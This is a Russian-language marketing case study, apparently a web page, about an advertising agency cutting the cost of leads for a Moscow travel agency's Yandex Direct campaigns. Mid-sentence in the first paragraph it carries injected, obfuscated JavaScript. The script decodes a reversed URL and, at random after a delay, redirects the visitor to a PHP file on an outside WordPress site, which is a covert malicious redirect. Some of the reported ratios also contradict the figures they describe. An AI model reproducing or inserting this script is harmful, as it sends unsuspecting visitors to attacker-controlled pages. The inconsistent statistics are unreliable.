Туристическое агентство в Москве. Специализация стандартная — подбор и продажа туров по разным направлениям. Рекламная кампания в Директе была разработана по весьма конкурентными и не релевантным фразам. Были допущены $mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour.jpg»>
РСЯ — 1 793 рубля слито в пустую.
Клиент потратил 9 845 руб за месяц и получил 19 заявок по цене 518 руб за каждую.
Результаты после проделанной работы
Прошла неделя после разработки и запуска новых рекламных кампаний, а результат уже впечатляет. Можете убедиться на деле.
Поиск — 31 заявка по 156 руб.
РСЯ — 57 лидов по 49 руб.
Теперь клиент платит 87 руб. за заявку в общем по двум кампаниям. Рост CTR, как вы можете видеть на скринах до и после работы, существенно вырос. Рекламный суточный бюджет увеличен, что позволяет клиенту получить гораздо больше заявок, что и требовалось.
Общие результаты по клиенту оказались следующими:
- Рост заявок — с 5 до 88 в неделю — почти в 5 раз больше
- Снижение цены лида — с 518 до 87 рублей — в 6 раз меньше
- Рост конверсии — с 1,35% до 13,9% — в 10 раз больше
Важно понимать, что это лишь лиды — обращения людей, заинтересованных в покупке тура. Это еще не значит, что за неделю будет 88 продаж. Но тут уже все зависит от умения продажников в турагентстве клиента.
Наша задача — увеличить количество обращений и снизить их стоимость — выполнена!
Могу заметить, что это одни из лучших результатов за последнее время. Если у вас есть вопросы, задавайте в комментариях. Появилось желание заказать контекстную рекламу — вам сюда.